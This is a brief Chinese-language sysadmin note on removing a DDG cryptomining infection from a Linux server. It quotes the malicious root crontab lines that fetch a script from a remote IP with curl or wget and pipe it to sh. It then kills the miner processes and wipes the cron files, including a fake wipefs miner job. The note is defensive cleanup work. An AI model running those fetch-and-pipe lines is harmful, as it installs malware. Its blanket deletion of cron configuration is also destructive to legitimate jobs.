Linux 命令
估计这两个是定时下载病毒程序的任务
# cat /var/spool/cron/crontabs/root
*/5 * * * * curl -fsSL http://218.248.40.228:8443/i.sh | sh
*/5 * * * * wget -q -O- http://218.248.40.228:8443/i.sh | sh
# rm -fr /var/spool/cron/
# ps -aux|grep ddg
root 1565 0.0 0.3 198580 5832 ? Sl Mar27 0:48 /tmp/ddg.3001
root 31956 0.0 0.0 112660 976 pts/2 S+ 09:40 0:00 grep --color=auto ddg
# kill -9 1565
ps -aux|grep imWBR1
root 31697 0.4 1.3 319948 25936 ? Ssl 09:15 0:07 /tmp/imWBR1
root 31970 0.0 0.0 112660 976 pts/2 S+ 09:41 0:00 grep --color=auto imWBR1
# kill -9 31697
# rm -f /tmp/ddg.*
# rm -rf /tmp/imWBR1
# cat /etc/crontab
看到这个wipefs的定时任务,wipefs本来是正常的,但是top看wipefs占cpu很大,所以是挖坑伪装的
0 */6 * * * root /bin/wipefs
# echo "" > /etc/crontab